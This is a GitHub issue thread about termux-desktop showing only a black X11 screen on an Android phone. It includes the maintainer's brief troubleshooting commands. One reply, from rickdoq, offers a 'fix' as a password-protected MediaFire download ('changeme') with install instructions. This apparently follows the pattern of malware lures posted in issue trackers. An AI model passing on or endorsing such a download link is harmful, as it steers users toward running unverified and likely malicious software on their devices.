sabamdarif/termux-desktop #19: so I have tried the 2 desktops all distos sometimes I get a panel but never does the screen appear yet there is another developer that has a rock solid build that works and I use it. so tell me why I get a black screen I have tired this all day with every  open I will give you a link to on that works evertime which is very similar it is solid..

chazzkattan123, 2024-08-31:
https://github.com/phoenixbyrd/Termux_XFCE
This one works every single time with one command "start" is is very similar but all your scripts alaywas pop up a black screen in x11 i spent the better part of the day trying to make it work non of the installed brought of a desktop I got a panel on one of them the link above works every single time.. what am I doing wrong I'm not a newbie 35 years of this kind of work .. I'm using a galaxy s24 ultra I always have to go back the the phoneixbrrd to use a working desktop.. one command start.. and it to offers hardware accel .. in short it just brings up a black x11 screen no matter how or what I configure the distro or instal or ad or not add. I cant ever get a desktop.

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

sabamdarif, 2024-08-31:
first kill the old termux x11 process `pkill -f com.termux.x11` , then try launching it with `tx11start --nogpu` tell me if it launch or not

sabamdarif, 2024-09-26:
Closing due to not responding

closed 2024-09-26 by sabamdarif